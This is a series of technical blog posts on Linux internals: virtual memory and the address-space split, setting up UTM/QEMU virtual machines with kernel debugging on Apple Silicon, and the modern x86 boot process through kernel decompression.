As we alluded to above, basically everything wants a piece of RAM. Using ps we can see just how many processes are vying for a slice of our precious RAM:

$ ps -e --no-headers | wc -l
404

And if anyone has ever looked into building or upgrading a PC, they’ll know that GB for GB, RAM is a lot more expensive than its non-volatile counterparts.

Not to mention, as the “random-access” implies, systems are able to access any memory location in physical memory directly, meaning things can get chaotic real fast if every process is trying to find and manage which bits of memory are up for grabs.

Cue virtual memory: a means to abstract processes away from the low level organisation of physical memory (this burden is passed to the kernel) by providing a Virtual Address Space.

0x02 The Virtual Address Space

Sweet, so the Virtual Address Space (VAS) provides a physical memory abstraction for processes to use by shifting the burden of managing low level organisation to the kernel! Cool cool … so, uh, how exactly?

Instead of having processes (and by extension their programmers) deal with accessing and managing physical memory directly, using virtual memory provides each process with its own virtual address space.

This virtual address space represents the range of all addressable physical memory. Let’s unpack that for a second. Not all free RAM, or even all the RAM you have installed in your computer, but all the possible physical memory your computer could address if it had it.

Modern 64-bit systems can handle 64 bits of data at a time. This means on typical 64-bit architectures, like x86_64 and aarch64, pointers to memory can be 64 bits long. So, theoretically speaking, we can have up to 2^64 different addresses[1].

This means our virtual address space on a 64-bit system ranges from 0x0 - 0xffffffffffffffff. That’s a lot of bytes!

For anyone wondering about this value, a “bit” is a binary value, it can be a 0 or 1. So 64 of them can represent 2^64 different combinations of values.

Let’s Touch on Addressing & Hexadecimal

Some of you will notice that I wrote the address in hexadecimal (hex), which is a base 16 number system; tl;dr being each digit counts up to 15 (0-9, then a-f) instead of 9 before we need a second digit.

We use hexadecimal over decimal because as a base 16 system, it lines up perfectly with the binary (base 2) system that forms the foundation of computing architecture and, as a result, all manner of digital data representation.

The reason hexadecimal “lines up perfectly” is that 16 is a power of 2; 2^4 specifically, which basically means that 1 hex digit can perfectly represent any 4 binary digits. 2 hex for 8 binary and so on. Whereas decimal simply doesn’t align like this.

So for things like memory, which is often byte-addressable, hexadecimal provides a more readable and information-dense alternative to using binary.

That’s a Big VAS

Back to the VAS, some of you might have clocked that 0xffffffffffffffff is an awful lot of bytes, right? Yep, unless you have 2^64 bytes AKA ~18 Exabytes AKA roughly 18.4 million Terabytes, then we’re clearly addressing far more memory than we have on our primary and secondary memory combined! And for each process?! What gives?

First and foremost, remember, this is a virtual address space provided to processes. The reality is the majority of this address space will go unused. For virtual memory to actually be used, and take up space, the virtual address has to be mapped to some physical address.

Mapped?? For virtual memory to be used by a process it first needs to be mapped to a physical address, where the data actually resides. It’s the kernel’s job to handle this and manage the bookkeeping for memory management.

At one point or another, the virtual memory address needs to be translated to the physical address where the data is actually located; this process is called address translation. You bet we’ll be looking into that some more later!

But let’s use this moment to remind ourselves that each process has its own virtual address space. So effectively, each process lives in a sandbox, believing it has unfettered access to addresses 0x0 - 0xffffffffffffffff. Processes are not aware of, or able to access, the virtual address space of another process.

Drastically over simplified view of how two processes can use the same virtual address which however translates to a different physical address.

So this means that process 1 & process 2 could make use of the same virtual address in their respective virtual address space, however these would both be translated by the kernel to two DIFFERENT physical addresses. Still following?

VAS Overview

So to summarise what we’ve learned so far: each process running on a Linux system has its own virtual address space. This VAS can span the entire addressable space for that architecture, however virtual addresses are only used after they have been mapped by the kernel to a physical address, i.e. they are actually taking up some space in physical memory.

It’s the kernel’s role to do all the bookkeeping and lower-level memory organisation around translating this virtual address to the actual physical address[1].

This way, processes and their programmers don’t need to concern themselves with any low-level memory organisation or even worry about other processes, they just have to interact with this broad VAS and the kernel will handle the rest.

Advantages of Virtual Memory

Given the above, one of the most obvious advantages of virtual memory is that it takes a lot of the burden off of programmers with regards to memory management.

However, as we’ll touch on more later, using a virtual memory scheme affords us several other important advantages as well:

It allows the kernel, behind the scenes, to actually map virtual addresses to secondary memory (SSDs & HDDs). This allows us to map less used/important[2] data to the slower secondary memory and free up our scarce RAM for data that needs it.
The address translation process and abstraction of physical memory allows us to implement additional features, notably security related ones, to our memory management

I say “around translating” as technically the actual address translation is done at a lower level, by the CPU
Another gross simplification, we might touch later on the metrics behind these decisions

0x03 The VM Split

Okay, let’s explore a little more how the virtual address space is used in Linux, as it’s not just a matter of throwing an 18EB address space at a user process and saying have at it!

About Processes

I realised I’m throwing around the term process left and right, and while I want to remain focused on the topic at hand, I’ll just touch briefly on what a process is in Linux.

Simply, a process is a running instance of a program[1]. Nowadays, programs can get pretty complex and, thanks to advances in programming languages and library support, the burden of managing that complexity is eased.

However, even the most simple “Hello, World!” program in C requires loading shared libraries which in turn need to interact with the kernel to get things done.

Don’t believe me? Take the basic C program below:

#include <stdio.h>
int main() {
   printf("Hello, World!\n");
   return 0;
}

With a few commands, we can get a quick insight into what’s going on behind the scenes:

$ ldd hw
        linux-vdso.so.1 (0x00007ffecb53e000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fc3747f3000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fc3749f3000)

ldd prints the shared object (shared library) dependencies required by hw, the dynamically linked binary built from hw.c. In our context, this means when we map our program into its virtual address space, we’ve also got to map any necessary dependencies too.

$ strace ./hw
execve("./hw", ["./hw"], 0x7ffd3ee6c190 /* 62 vars */) = 0
brk(NULL)                               = 0x563a56b24000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff70afecc0) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=180840, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 180840, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f9ab51e1000
close(3)                                = 0
openat(AT_FDCWD, "/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`|\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 80, 848) = 80
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0K@g7\5w\10\300\344\306B4Zp..., 68, 928) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2150424, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9ab51df000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1880536, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f9ab5013000
mmap(0x7f9ab5039000, 1355776, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f9ab5039000
mmap(0x7f9ab5184000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x171000) = 0x7f9ab5184000
mmap(0x7f9ab51d0000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bc000) = 0x7f9ab51d0000
mmap(0x7f9ab51d6000, 33240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9ab51d6000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9ab5011000
arch_prctl(ARCH_SET_FS, 0x7f9ab51e0580) = 0
mprotect(0x7f9ab51d0000, 12288, PROT_READ) = 0
mprotect(0x563a56a14000, 4096, PROT_READ) = 0
mprotect(0x7f9ab523c000, 8192, PROT_READ) = 0
munmap(0x7f9ab51e1000, 180840)          = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x563a56b24000
brk(0x563a56b45000)                     = 0x563a56b45000
write(1, "Hello, World!\n", 14Hello, World!
)         = 14
exit_group(0)                           = ?
+++ exited with 0 +++

strace allows us to trace system calls and signals. System calls are (as we can learn via man syscalls[2]) the fundamental interface between an application and the Linux kernel.

So as we can see, there’s an awful lot going on under the hood of our little “Hello, World!” program - it isn’t until the bottom that we see the actual write syscall that writes our string "Hello, World!" to stdout (aka the console)!

That’s because the majority of that is setting up the virtual address space for our program. It might not all make sense now, but we can see our dependencies from ldd being set up as well as various memory related syscalls including brk, mmap, mprotect and munmap.

In Linux world, basically everything is considered a process or a file, so even multiple threads of the same running program are all viewed as separate processes
The second section of man, man 2, is for syscall manuals. So if you want to read more about read above for example, you can use man 2 read for the syscall’s man page

User-mode & Kernel-mode

So as we just saw, for a program to even be loaded into memory and run as a process, there’s an awful lot of interaction that needs to go on with the kernel.

We established that syscalls act as an interface between an application and the Linux kernel, meaning that on the other end of that syscall there’s some kernel code running.

Let’s pause a moment and quickly touch on why syscalls are even a thing. Why not just have the process do the systemy thing it needs to do directly? Like in a standard library?

The reason is due to privilege levels. The tl;dr on this is that our hardware lets us select several different privilege levels, and in Linux we make use of two of these. So at any given time we are running in user-mode or kernel-mode.

As a result we also have the terms user-space and kernel-space. Typically stuff in user-space is running in user-mode and stuff in kernel-space runs in kernel-mode.

The kernel resides firmly in kernel-space and as such can only be run in kernel-mode and the only way for a user-space process to change the privilege level is via a syscall.

So, syscalls act as gatekeepers of sorts, allowing user-space processes to get the kernel to carry out specific, privileged actions on its behalf, without giving away the keys to the kingdom.

Cue The VM Split!

So to sum up what we know so far:

Each process has its own, sandboxed, virtual address space
Each process needs to run kernel code to set up its VAS, done via syscalls

This begs the question, after we call our syscall and transfer to kernel-mode, we’re still running within the same process context, so how do we know where the kernel code is?

We map the kernel into the VAS, that’s how! Almost like a shared library, the kernel is also mapped into the VAS, I mean we have enough space right?

There’s an overhead to switching the CPU’s context (tl;dr there’s context specific registers that get swapped in and out when we want to run in a different context, e.g. run another process), so to avoid this the kernel is mapped into the same VAS as the process.

This is all implemented by splitting the virtual memory into two sections, the User Virtual Address Space and the Kernel Virtual Address Space:

x86_64 VM split

On x86_64 Linux systems, we can see the lower 128TB of memory is assigned to the user virtual address space and the upper 128TB is assigned to the kernel virtual address space. The rest? Well that’s just an unused, no man’s land bridging the gap between the two.

In fact, on typical x86_64 setups today only 48 bits of the virtual address are actually used; the most significant 16 bits (MSB 16) are always set to 0 for the User VAS and 1 for the Kernel VAS. Makes it convenient for spotting what kind of address you’re looking at in a debugger!

The exact proportions of the VM split and details like how many bits are used for addressing are architecture & config specific.

Next Time!

Today we laid the groundwork for our journey to understanding virtual memory on modern Linux systems. We briefly covered what we mean when we talk about physical vs virtual memory, followed by an understanding of the virtual address space itself.

Now that we understand how (and at a high level why) the virtual address space is split up into the two sections - the User VAS & Kernel VAS - next time we can delve deeper into each of these sections.

Furthermore, I want us to get a closer look at the lower level details on what’s going on behind the scenes in the kernel in regards to memory management as well as touching on the role the hardware plays in enabling this.

And likely much, much more - so stay tuned!

exit(0);

Setting Up A Virtualised (Linux) Empire on Apple Silicon

sam4k — Sat, 08 Jan 2022 19:07:10 +0000

I recently started an awesome new role as a Sr. Security Researcher (yay me) and as a work from home position this came with the perk of picking some shiny new work kit; with the two main contenders being a new Dell Precision or a MacBook Pro.

In my infinite wisdom (read: hubris), of course I opted for the new MacBook Pro - after all, with all the headlines and buzz, I wanted to see what this M1 fuss was all about!

The panic started to set in, had I made a horrific decision? In getting caught up in the hype and excitement I’d forgotten the implications of switching my workflow to a completely different architecture, and one as new as Apple’s Silicon.

However, after some time researching, tweaking and debugging I’m now in a position where I can happily say I have no regrets moving to Apple Silicon and in fact am beginning to see what the hype is all about! Of course, this isn’t to say the grass really is perfectly green on the other side, there are still issues, particularly due to its infancy, but more on that soon!

So without further ado, below is the culmination of moments of bewilderment, exasperation and elation as I transitioned my workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.

My Virtualised Empire
Virtualisation Options on M1
UTM: A Whistle-stop Tour
- Aarch64 Guests
- x86_64 Guests
  - Performance
  - Weirdness
- Networking
- Kernel Debugging with GDB
  - Host-Guest
  - Guest-Guest
  - Also, No GDB on HVF
- Resizing Disks
Conclusion

My Virtualised Empire

So, turns out the title might have been a little clickbaity, as my virtual empire is more of a virtual hamlet. Before I take any more of your time, take a look at the diagram below:

This is the general gist of what I set out to achieve, and will outline how to achieve, in this post. As a security researcher and Linux enthusiast there were a couple of important factors:

I want a ‘dev’ guest that would run Linux and be my main development workhorse; this is where I’d be spending a lot of time so performance is key
I need to be able to spin up a variety of ‘research’ guests; likely short lived and many so ease of setup is important
Speaking of variety, I need to be able to spin up guests running on different architectures, specifically aarch64 (native) and x86_64 (emulated)
Finally, I break things … often. So debugging is important too! While not strictly relevant to the overarching topic of virtualisation, I’ll touch on this briefly

And, well, that’s about it! If this sounds of any interest to you, feel free to continue reading as I outline how I achieved this setup, the thought process behind some of my choices and, likely most relevant, some of the gotchas I encountered along the way.

Virtualisation Options on M1

Before receiving my MacBook Pro, I primarily worked in Linux environments and my virtualisation software of choice was VMWare Workstation. Moving to MacOS, I wasn’t sure what the virtualisation ecosystem was like.

Unsurprisingly VMWare was still a big name, with their MacOS software hypervisor Fusion being popular. However, it wasn’t the only contender. Parallels is also another popular choice for virtualisation on MacOS. Slightly less in the limelight were VirtualBox and QEMU-based UTM.

I won’t bore you with a breakdown of the various features, pros and cons for each of these products because in the end it was an extremely simple decision. Mainly due to the fact that UTM is the only one (at the time of writing) that meets all my criteria above.

As far as I know, VMWare and Parallels have no plans to support x86_64 emulation on M1’s and VirtualBox doesn’t have any kind of M1 support yet. See? Easy!

UTM: A Whistle-stop Tour

UTM is another virtualisation software built specifically for Apple products. What’s really neat about UTM for my criteria is that it’s built on top of QEMU. For those that haven’t heard of it, QEMU is a free and open-source hypervisor. In particular:

UTM can use Apple’s hypervisor framework[1] to virtualise aarch64 guests at near native speeds, which is great for my dev box!
Furthermore, UTM provides the option to use QEMU’s Tiny Code Generator (TCG)[2] which allows us to emulate different architectures (at a significant performance cost)
For those that have used QEMU in the past, UTM provides an amazingly simplified yet flexible front-end for the deluge of different parameters QEMU can take
By using QEMU, we have access to the gdbstub QEMU employs for kernel-level debugging (with caveats below)

For people reading this near time of publication, I heartily recommend using the UTM 3.0.0 (beta) release which can be found here. It adds some important features, as well as some neat quality of life improvements.

Aarch64 Guests

Okay, let’s start off with the simplest setup. If you have no architecture requirements, you definitely want to run an aarch64 guest to match your M1 host’s architecture. This allows you to make full use of Apple’s hypervisor framework and get the best performance.

In terms of guest OS, you’ll need to make sure you’re running an arm64/aarch64 build! Unfortunately the demand is still scaling up for these, so you may find your favourite distro might not have support for this. I made do with Ubuntu 22.04 Jammy, as they have an aarch64 desktop build handy[1]. For Arch users, there’s also ArchLinux ARM.

For setup, it’s really as simple as following the UTM setup wizard[2]. The main thing to remember is that we want to choose “Virtualise” as we don’t need to emulate another architecture. Other than that, it’s all fairly straightforward. No tweaks needed!

https://cdimage.ubuntu.com/daily-live/current/
Requires UTM 3.0.0+

x86_64 Guests

Moving on, now we’ve got our dev guest up, what if we want to do some x86_64 activities? Again, using the UTM wizard, this time we’ll want to select “emulation” and proceed with the rest of the wizard, so far so good!

Now for the bad news, in order to emulate another architecture we need to use TCG, QEMU’s Tiny Code Generator. Unsurprisingly emulating a completely different CPU architecture is a lot slower than using the native hypervisor as we were able to previously.

Performance

To mitigate the impact of this, there’s a few things we can do:

Avoid GUIs where possible! That’s right, pick up a server edition or something
If you must, be stingy on resolution where possible; in the VM settings -> "Display", consider the graphics type and disabling retina mode
Go into VM settings -> "System" -> "Show Advanced Settings" and make sure to up the cores if possible and check “Force Multicore”; on x86_64 at least this is seen to have marked improvements on perf
In the same section as above, I’d also recommend the qemu64 CPU for best compatibility results unless you have specific requirements

Weirdness

Again, unsurprisingly, weird things can crop up when running a fully-fledged Linux operating system on an emulated architecture, and I mean WEIRD. Programs not working? System errors popping up? Kernel panics?

This could be a result of missing “CPU Flags”, under the VM settings -> "System" -> "Show Advanced Settings". Yep, there’s a lot. Over the years these have accumulated and you might find that some x86_64 instructions that are being run in your guest might require specific flags to be enabled.

I had a situation where some software was running and then instantly crashing. Some digging later and it turned out its kernel driver was failing to load due to a SIGILL, which turned out to be caused by a specific instruction in a crypt library it was using. It was a matter of googling the cpu flag and I was able to find the culprit.

Networking

After years spinning up my own shoddy initramfs based QEMU VMs through bash scripts, I learned to stay clear of any kind of networking. It just never panned out. Luckily, I can say the absolute opposite for UTM. For me, it just worked.

All of my VMs are configured with the “Shared Network” network mode, in the VM settings -> "Network", with the virtio-net-pci card. With this setup, each of your guests can access the internet like a classic NAT setup, with the added bonus of a bridge on the host which will allow all your guests (and host) to communicate to one another.

Kernel Debugging with GDB

The process of setting this empire up, let alone my job, required being able to do some kernel debugging on my guests. Like other virtualisation software, QEMU provides a gdbstub which will act as a gdb server on your guest, allowing you to connect remotely and debug the guest’s kernel - it’s pretty neat.

https://qemu.readthedocs.io/en/latest/system/gdb.html

Host-Guest

UTM uses the exact same arguments as QEMU, if you’re familiar with that, so we just need to add the -s[1] argument to our guest and it’ll set up the gdbstub on your GUEST to listen on localhost:1234 on your HOST.

To do this we go to VM settings -> "QEMU". This section will show you how your configuration and settings translate into QEMU arguments. If we scroll to the bottom there’s an input labelled “New” where we can add our own. Pop in -s and we’re good!

Now, if we open the terminal on our MacOS host and start gdb w- just kidding, gdb doesn’t have a build available for M1’s at the time of writing. But you CAN use lldb to connect to the remote server currently listening on localhost:1234 if you’re so inclined, otherwise…

QEMU users might be used to -s -S, where the -S will tell QEMU to not start the guest until you tell it to via gdb; this is already in use by UTM as far as I can tell, so we just make do without

Guest-Guest

Ew, lldb right?! You might instead want to debug a guest from another guest; in my case I want to be able to use gdb on my dev guest to debug one of my research targets.

Fortunately, it’s not much work. As I mentioned above, QEMU’s -s sets up a gdbstub to listen on localhost:1234. This is because it’s an alias for the command -gdb tcp:localhost:1234. So all we need to do is change localhost to the bridge interface our host uses to communicate with the guests.

ifconfig -a on your MacOS terminal will show you all your interfaces and you should see bridge100 or similar with an IP address ending in .1 that matches your guest LAN. For me this is 192.168.64.1; my guests can reach my MacOS host via this IP. So this is where we’ll set up our gdbstub to listen, by adding -gdb tcp:192.168.64.1:1234 in place of -s in the same QEMU arguments section.

Now from my dev VM I’ll be able to access the listener, allowing me to debug any other guests on the shared network, neat! I can do this in gdb with the following command:

(gdb) target remote 192.168.64.1:1234

Also, No GDB on HVF

Remember I said something about the grass not being so green? Well, hvf (QEMU’s accelerator that uses Apple’s Hypervisor framework) doesn’t support breakpoints (hardware or otherwise) via the gdbstub as of the time of writing (version 6.2.0 is used by UTM currently).

This means that whenever you want to debug (with breakpoints) a guest, regardless of the architecture, you need to make sure you go into VM settings -> "QEMU" and uncheck "Use Hypervisor". Yep, it’s going to be slower, but it won’t be forever.

Resizing Disks

Something that might come in handy for some is knowing how to resize your guests’ disks, without having to attach a new one and go through that whole rigamarole.

For this you’ll need to use QEMU in the terminal and I couldn’t immediately find any binaries UTM might be using in their package, so I installed it via Brew, using brew install qemu - fairly straightforward.

The command qemu-img resize ~/Library/Containers/com.utmapp.UTM/Data/Documents/.utm/Images/disk-0.qcow2 +10G will allow you to extend your VM’s disk by 10GB.
- Make sure you choose the right VM folder and disk!
Depending on your guest OS, you’ll likely need to do some additional tinkering to get the system to use the additional space, typically by extending the partition or logical volume.
- E.g. for extending LVM, you can follow this guide

Conclusion

And that’s pretty much it! As you can see it’s not a particularly hands-on process, it just takes a bit of research and knowing what to use and what workarounds to take. If there are any additional gotchas or tips I stumble upon, I’ll add them to this post.

I’ve no doubt the ecosystem and support for Apple silicon will only improve and honestly I’ve been impressed by the speed the open-source community has adopted it.

exit(0);

Linternals: The (Modern) Boot Process [0x02]

sam4k — Sun, 10 Oct 2021 14:13:00 +0000

Welcome to the second part of my totally-wasn’t-meant-to-be-a-one-part Linux internals post on the modern boot process! Last time I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your storage device; briefly touched on what happens when you power on your computer and what happens when it hands over control to UEFI.

So without any more rambling and rehashing, let’s jump right back into the action. UEFI has just consulted the EFI variables in NVRAM to determine boot order, located the first available bootloader on the list and will now transfer control over to it …

0x03 Optional Bootloader
- Wait This Is Optional?
0x04 The Kernel (Setup)
- Getting to Main
- The First C
- And Back To Assembly
- Decompression Time!
  - First Some Background
  - Back To Decompression
Next Time

0x03 Optional Bootloader

There’s a number of different bootloaders out there that you can use with your Linux system, each with their own pros and cons, but at their core they’ll all need to meet the requirements laid out by the Linux Boot Protocol[1].

For reference, any specifics in this section will be referring to the common GNU GRUB 2 bootloader. It’s worth noting that while we’re operating within a Linux context, GRUB 2 and other bootloaders are capable of booting a variety of systems, not just Linux.

In days gone by this was a multi-stage process due to the size constraints of the old BIOS+MBR system, however nowadays the entire bootloader can be stored in the ESP and UEFI can hand control straight over. In the case of GRUB 2, this is grub_main(void) over in grub-core/kern/main.c, so feel free to follow along.

First things first there’s going to be some architecture-specific machine initialisation, like setting up the console; some rudimentary memory management; locating and loading dependencies/addons (e.g. GRUB modules); loading any configs etc.

With initialisation handled, the bootloader is in a position to be able to do its job. Typically modern bootloaders like GRUB will provide an interactive menu to the user, with varying degrees of features. Invariably, however, there should be the option to boot one or more kernels/operating systems.

As a quick aside, in GRUB this post-initialisation mode is called “normal mode” and we can see this in a call to grub_load_normal_mode() at the end of grub_main(), and yes keen-eyed and battle-scarred GRUB users might notice a call to grub_rescue_run () just under that. So, if normal mode falls through, we end up at the dreaded grub rescue >…

Anyway, back to generic bootloader things, when we select our kernel (or more likely let the timer tick down and select the default option) - which is of course a Linux one, right?! - we begin the “Linux Boot Protocol” as outlined above[1] to get our chosen kernel up and running.

The short and sweet of this is that the bootloader will bootstrap the kernel by loading into memory the “kernel real-mode code”, consisting of the kernel setup and kernel boot sector, creating a memory mapping similar to the one seen below:

        ~                        ~
        |  Protected-mode kernel |
100000  +------------------------+
        |  I/O memory hole       |
0A0000  +------------------------+
        |  Reserved for BIOS     | Leave as much as possible unused
        ~                        ~
        |  Command line          | (Can also be below the X+10000 mark)
X+10000 +------------------------+
        |  Stack/heap            | For use by the kernel real-mode code.
X+08000 +------------------------+
        |  Kernel setup          | The kernel real-mode code.
        |  Kernel boot sector    | The kernel legacy boot sector.
X       +------------------------+
        |  Boot loader           | <- Boot sector entry point 0000:7C00
001000  +------------------------+
        |  Reserved for MBR/BIOS |
000800  +------------------------+
        |  Typically used by MBR |
000600  +------------------------+
        |  BIOS use only         |
000000  +------------------------+

... where the address X is as low as the design of the boot loader permits.

Without going down the rabbit hole, the tl;dr on “real-mode” is that modern processors have several “processor modes” (legacy modes, long mode). These control how the processor sees and manages the system memory and the tasks that use it. For legacy reasons, processors boot into real-mode and this is the mode we have been running in so far [3].

One of the limits of the “legacy” real-mode is a limit of 1MB addressable RAM. Yep. Old school right? So that explains why the memory map above only goes to 100000 and why the area beyond it is labelled “Protected-mode kernel”, neat!
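To make that 1MB limit a bit more concrete, here's a minimal sketch of how real-mode addressing works: a 16-bit segment is shifted left by four bits and added to a 16-bit offset. The function name is my own, and I'm ignoring the A20 line quirk for simplicity.

```python
def real_mode_address(segment: int, offset: int) -> int:
    """Translate a 16-bit segment:offset pair into a physical address."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must each fit in 16 bits")
    # Each segment starts on a 16-byte boundary, hence the shift by 4
    return (segment << 4) + offset


# The boot sector entry point 0000:7C00 from the memory map above
print(hex(real_mode_address(0x0000, 0x7C00)))
# F000:FFFF is the last byte below the 1MB (0x100000) mark
print(hex(real_mode_address(0xF000, 0xFFFF)))
```

Note that different segment:offset pairs can point at the same byte, e.g. 07C0:0000 and 0000:7C00.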

Back to the kernel real-mode code we’ve loaded into memory for the kernel setup. Once loaded into memory, the bootloader will read and set fields from the kernel setup header, which can be found at a fixed offset from the start of the setup code[4].

This header helps define the information necessary for the bootloader to hand over control directly to the kernel setup code.
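If you fancy poking at this header yourself, here's a rough sketch that pulls a few fields out of a kernel image. The offsets (setup_sects at 0x1F1, boot_flag at 0x1FE, the "HdrS" magic at 0x202 and the protocol version at 0x206) are taken from the x86 boot protocol documentation; the function name and the returned dict are just my own choices for illustration.

```python
import struct


def parse_setup_header(image: bytes) -> dict:
    """Read a handful of setup header fields from the start of a bzImage."""
    if len(image) < 0x208:
        raise ValueError("image too short to contain a setup header")
    setup_sects = image[0x1F1]
    (boot_flag,) = struct.unpack_from("<H", image, 0x1FE)
    magic = image[0x202:0x206]
    (version,) = struct.unpack_from("<H", image, 0x206)
    if boot_flag != 0xAA55 or magic != b"HdrS":
        raise ValueError("no boot protocol 2.00+ setup header found")
    return {
        # The protocol treats a setup_sects value of 0 as 4
        "setup_sects": setup_sects or 4,
        # The version is stored as (major << 8) + minor
        "protocol": f"{version >> 8}.{version & 0xFF:02d}",
    }
```

On a real system you could feed it the first few hundred bytes of your kernel image, e.g. parse_setup_header(open("/boot/vmlinuz-linux", "rb").read(0x400)), permissions allowing.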

Wait This Is Optional?

The keen-eyed of you will be wondering why the section was titled “Optional Bootloader” - after all that all seemed kinda crucial right? Well, harnessing the flexibility and power of UEFI over Legacy BIOS, “the Linux kernel supports EFISTUB booting which allows EFI firmware to load the kernel as an EFI executable”[5].

However, bear in mind that there are tradeoffs between using EFISTUB and the more feature-rich bootloaders-of-old like GRUB 2.

[1] For x86, we can find this in [linux/documentation/ARCH/boot[ing].rst](https://github.com/torvalds/linux/blob/master/Documentation/x86/boot.rst)
[2] See grub_main(void) over in grub-core/kern/main.c, first thing we call is arch specific grub_machine_init().
[3] https://en.wikipedia.org/wiki/X86-64#Operating_modes
[4] For x86 we can see this action over in [/arch/x86/boot/header.S](https://github.com/torvalds/linux/blob/0adb32858b0bddf4ada5f364a84ed60b196dbcda/arch/x86/boot/header.S#L297)
[5] https://wiki.archlinux.org/title/EFISTUB

0x04 The Kernel (Setup)

Okay, so we’re not QUITE in the kernel proper yet, we still need to run the kernel setup code (/arch/x86/boot/header.S for x86) in order to basically get a suitable environment up and running to be able to run arch/x86/boot/main.c in real mode, the first bit of C code! And THEN we can start to look into loading the rest of the kernel into memory. Anyway:

Getting to Main

In order to get to main, header.S does some housekeeping to make sure everything is how it should be. This includes making sure all the segment register values are aligned, setting up the stack and BSS area, as well as some error handling in the form of checking a setup signature to ensure everything’s looking good before jumping to main.

The First C

It’s all starting to kick off now! Except we’re still not technically in the kernel yet, as that’s still sat in a compressed image, waiting to be freed![1] For the sake of brevity, I’m going to quickly cover some of the key steps we take after running arch/x86/boot/main.c in order to ultimately decompress the kernel and run the actual kernel.

Initialisation, initialisation and then some more initialisation! During this stage the heap, console, keyboard, video mode and more are initialised. Furthermore CPU validation is carried out as well as memory detection in order to provide a map of available RAM to the kernel.

Another important part of the setup is the transition into protected mode and then 64-bit mode. Remember earlier we mentioned how we’ve been running in real-mode, one of several processor modes, which comes with a limit of 1MB addressable RAM?

The last task of arch/x86/boot/main.c is to shed those shackles and enable the transition into protected mode; the tl;dr is this is a more powerful mode with full access to the system’s memory, multitasking and support for virtual memory. After setting up the Interrupt & Global Descriptor Tables (IDT, GDT) among other things, we jump to the 32-bit protected mode entry point.

And Back To Assembly

Yep, that’s right, the 32-bit entry point is defined in arch/x86/boot/compressed/head_64.S and will cover some more setup, similar to what we saw for real-mode, as well as enabling the transition into long mode AKA 64-bit mode. So many modes, right?

Well, technically 64-bit mode is an enhancement of protected mode and is the native mode for x86_64 processors. It provides additional features and capabilities; allowing the CPU to take advantage of 64-bit processing.

During this stage some more setup occurs, the GDT is updated, page tables are initialised and after entering 64-bit mode, we jump to the 64-bit entry point in head_64.S.

Decompression Time!

First Some Background

Okay, there’s a lot to unpack here (haha), so I’ll try to keep things brief. At boot time, the kernel is typically sat on disk as a compressed image. You can check this out for yourself:

[sam4k ~]$ ls /boot
...  efi  grub  ...  vmlinuz-linux
[sam4k ~]$ file /boot/vmlinuz-linux 
/boot/vmlinuz-linux: Linux kernel x86 boot executable bzImage ...

With a little peek, we can see our kernel as it’s stored on disk! You’ll notice a couple of things here, one being that the kernel is compressed as a bzImage and that it’s an executable?!

The bzImage, big zImage, format was developed (unsurprisingly) to tackle size limitations for a growing Linux kernel. Although originally compressed with gzip, newer kernels have wider support, including LZMA & bzip2[2].

bzImage files also follow a specific format, containing concatenated bootsect.o + setup.o + misc.o + piggy.o, where piggy.o contains a gzipped vmlinux file in its data section[2]. Still following?
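As a rough illustration of that layout, here's a sketch that hunts for a gzip stream inside a blob and decompresses it. This assumes the kernel was actually compressed with gzip (yours may well use something else), and the function name is hypothetical; it's the same basic idea as scanning the image for a compression magic.

```python
import zlib

# Two-byte gzip magic followed by the "deflate" compression method
GZIP_MAGIC = b"\x1f\x8b\x08"


def extract_gzip_payload(blob: bytes) -> bytes:
    """Return the first gzip stream in blob that decompresses cleanly."""
    start = blob.find(GZIP_MAGIC)
    while start != -1:
        try:
            # wbits=31 tells zlib to expect a gzip header and trailer;
            # a decompress object ignores any bytes after the stream ends
            return zlib.decompressobj(wbits=31).decompress(blob[start:])
        except zlib.error:
            # False positive, keep looking from the next byte
            start = blob.find(GZIP_MAGIC, start + 1)
    raise ValueError("no gzip stream found")
```

If the result starts with b"\x7fELF", you've likely found your vmlinux.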

